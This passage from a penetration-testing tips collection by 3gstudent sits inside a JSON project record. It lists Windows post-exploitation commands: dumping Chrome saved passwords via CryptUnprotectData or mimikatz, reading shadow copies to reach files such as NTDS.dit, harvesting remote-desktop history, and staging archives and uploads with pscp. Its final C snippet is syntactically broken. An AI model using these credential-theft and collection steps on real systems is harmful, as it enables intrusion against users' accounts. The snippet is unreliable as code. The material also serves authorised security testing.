Panel\\Desktop\" /v SCRNSAVE.EXE\n```\n\nIf the screen saver is turned on, check the key value `ScreenSaveTimeOut` to get the screen saver startup time (in seconds).\n\n```\nREG QUERY \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v ScreenSaveTimeOut\n```\n\n---\n\n### Tips 59  Hide the interface of the specified process\n\nChange window state via API ShowWindowAsync.\n\nPOC:\n\nhttps://github.com/3gstudent/Writeup/blob/master/HiddenProcess.ps1\n\n---\n\n### Tips 60 Screen capture of Windows system via Powershell\n\nhttps://gallery.technet.microsoft.com/scriptcenter/eeff544a-f690-4f6b-a586-11eea6fc5eb8/file/50729/1/Take-ScreenShot.ps1\n\n---\n\n### Tips 61 View the programs currently installed on Windows systems\n\nObtained by enumerating the registry keys HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\n\n**Note:**\n\nThe directory of the 32-bit program under the 64-bit system is `HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall`\n\nPOC:\n\nhttps://github.com/3gstudent/ListInstalledPrograms\n\n---\n\n### Tips 62 Get the current system type via wmi\n\n```\nwmic /NAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ComputerSystem get PCSystemType /FORMAT:list\n```\n\n|Value|Meaning|\n| - | - |\n|0 (0x0) |Unspecified|\n|1 (0x1) |Desktop|\n|2 (0x2) |Mobile|\n|3 (0x3) |Workstation|\n|4 (0x4) |Enterprise Server|\n|5 (0x5) |Small Office and Home Office (SOHO) Server|\n|6 (0x6) |Appliance PC|\n|7 (0x7) |Performance Server|\n|8 (0x8) |Maximum|\n\n\n\n---\n\n### Tips 63 Export the password saved by the Chrome browser\n\n#### 1, online\n\nMethod 1:\n\nRead the database file `%LocalAppData%\\Google\\Chrome\\User Data\\Default\\Login Data`. If the Chrome browser is running and cannot be read directly, you need to copy it first.\n\nDirect decryption in the current system call API CryptUnprotectData.\n\nMethod 2:\n\nmimikatz\n\n```\nvault::cred\n```\n\nReference:\n\n[《渗透技巧——导出Chrome浏览器中保存的密码》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81)\n\n#### 2, offline\n\nYou do not need to obtain the user's plain text password when using the Master Key.\n\nReference:\n\n[《渗透技巧——利用Masterkey离线导出Chrome浏览器中保存的密码》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%88%A9%E7%94%A8Masterkey%E7%A6%BB%E7%BA%BF%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81)\n\n\n---\n\n### Tips 65 Get the history file of the system through ShadowCopy\n\nQuery whether the current system has a snapshot:\n\n```\nvssadmin list shadows\n```\n\nAccess the files in the history snapshot:\n\n```\nmklink /d c:\\testvsc \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy15\\\ndir c:\\testvsc\n```\n\nReference:\n\n[《域渗透——获得域控服务器的NTDS.dit文件》](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E8%8E%B7%E5%BE%97%E5%9F%9F%E6%8E%A7%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84NTDS.dit%E6%96%87%E4%BB%B6)\n\n---\n\n### Tips 64 How to execute multiple commands on the command line\n\n```\naa \u0026\u0026 bb\n```\n\nExecute aa, and then execute bb after success.\n\n```\naa || bb\n```\n\nExecute aa first. If the execution is successful, bb is no longer executed. If it fails, bb is executed again.\n\n```\naa \u0026 bb\n```\n\nExecute aa first and then bb, regardless of whether aa is successful.\n\n\n---\n\n### Tips 65 Sending mail via powershell (with attachments)\n\nTwo methods, the code can refer to:\n\nhttps://github.com/3gstudent/SendMail-with-Attachments\n\n---\n\n### Tips 66 Get the remote desktop connection history of all users by reading the registry with powershell\n\nThe default read registry can only get the registry information of the currently logged in user. You can get the registry configuration of the unlogged in user by loading the configuration unit with `reg load`.\n\nThe code can refer to:\n\nhttps://github.com/3gstudent/ListInstalledPrograms\n\nReference:\n\n [《渗透技巧——获得Windows系统的远程桌面连接历史记录》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E8%8E%B7%E5%BE%97Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E8%BF%9E%E6%8E%A5%E5%8E%86%E5%8F%B2%E8%AE%B0%E5%BD%95)\n\n---\n\n### Tips 67 Use pscp to upload files from Windows to Linux via the command line\n\ndownload link:\n\nhttps://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html\n\nThe upload command is as follows:\n\n```\npscp.exe -l root -pw toor -r c:\\1\\putty.exe 192.168.62.131:/root/\n```\n\nIt will prompt whether to store the cache file.\n\nEnter `Y`, create a new key in the registry: `HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\SshHostKeys`, do not need to enter `Y` again for the next connection.\n\nEnter `N`, do not save the registry key.\n\nImplement the method of automatically entering the `N` command:\n\n```\necho n |pscp.exe -l root -pw toor -r c:\\1\\putty.exe 192.168.62.131:/root/\n```\n\n---\n\n### Tips 68 Enumeration of Windows System Handles\n\n- On Windows 8 and later, NtQueryInformationProcess with ProcessHandleInformation is the most efficient method.\n- On Windows XP and later, NtQuerySystemInformation with SystemExtendedHandleInformation.\n- On Windows 7 and later, NtQuerySystemInformation with SystemHandleInformation can be used.\n\nNote：\n\n- WinXP and Win7,ObjectTypeNumber = 0x1c\n- Win8 and later,ObjectTypeNumber = 0x1e\n\n---\n\n### Tips 69 Use rar.exe to compressed file\n\nhttps://github.com/3gstudent/test/raw/master/rar.exe\n\nMaximum compression ratio:\n\n```\nrar.exe a -m5 1.rar 1.txt -p123456\n```\n\nVolume compression, one compression package per 10MB：\n\n```\nrar.exe a -m5 -v10m 1.rar 1.txt -p123456\n```\n\nDecompression:\n\n```\nrar.exe e 1.rar -p123456\n```\n\n---\n\n### Tips 70 Use the command tasklist/v to column processes \n\nThe /v parameter shows detailed information, which is helpful for collecting information.\n\n---\n\n### Tips 71 Remove the first string from the array in C language\n\n```\nWCHAR srcString[20] = L\"I love you!\";\nWCHAR targetString[20];\nwcsncpy_s(targetString, wcslen(targetString), srcString + 1, (wcslen(targetString) - 1);\nwprintf_s(L\"%s\\n\", targetString);\n```\n\n---\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F3gstudent%2FPentest-and-Development-Tips","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F3gstudent%2FPentest-and-Development-Tips","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F3gstudent%2FPentest-and-Development-Tips/lists"}